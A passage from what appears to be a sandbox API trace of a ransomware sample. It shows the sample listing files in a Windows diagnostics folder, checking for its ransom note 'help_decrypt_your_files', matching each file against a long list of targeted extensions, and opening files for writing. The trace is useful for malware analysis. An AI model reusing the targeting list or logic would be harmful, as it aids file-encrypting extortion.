v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0168.330] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.330] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.331] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackescalations.xml" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackescalations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0168.332] CloseHandle (hObject=0xffffffff) returned 1
	[0168.333] CloseHandle (hObject=0xffffffff) returned 1
	[0168.340] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe05d08a5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe05d08a5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe05d08a5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.PERFTRACKPOINTDATA.xml", cAlternateFileName="WINDOW~4.XML")) returned 1
	[0168.340] lstrcmpW (lpString1="WINDOWS.PERFTRACKPOINTDATA.xml", lpString2="..") returned 1
	[0168.340] lstrcmpW (lpString1="WINDOWS.PERFTRACKPOINTDATA.xml", lpString2=".") returned 1
	[0168.340] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\"
	[0168.340] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\", lpString2="WINDOWS.PERFTRACKPOINTDATA.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml"
	[0168.340] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml") returned 89
	[0168.340] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.341] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackpointdata.xml") returned 0x59
	[0168.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.341] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackpointdata.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.341] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackpointdata.xml" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackpointdata.xml") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackpointdata.xml"
	[0168.341] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackpointdata.xml") returned 89
	[0168.341] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.342] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0168.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.342] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0168.342] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.343] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.343] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackpointdata.xml" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackpointdata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0168.343] CloseHandle (hObject=0xffffffff) returned 1
	[0168.343] CloseHandle (hObject=0xffffffff) returned 1
	[0168.343] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe0263207, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe0263207, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe0263207, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.SIUF.xml", cAlternateFileName="WINDOW~2.XML")) returned 1
	[0168.343] lstrcmpW (lpString1="WINDOWS.SIUF.xml", lpString2="..") returned 1
	[0168.344] lstrcmpW (lpString1="WINDOWS.SIUF.xml", lpString2=".") returned 1
	[0168.344] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\"
	[0168.344] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\", lpString2="WINDOWS.SIUF.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml"
	[0168.344] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml") returned 75
	[0168.344] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.344] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml", cchLength=0x4b | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.siuf.xml") returned 0x4b
	[0168.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.345] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.siuf.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.345] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.siuf.xml" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.siuf.xml") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.siuf.xml"
	[0168.345] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.siuf.xml") returned 75
	[0168.345] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.345] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0168.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.346] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.u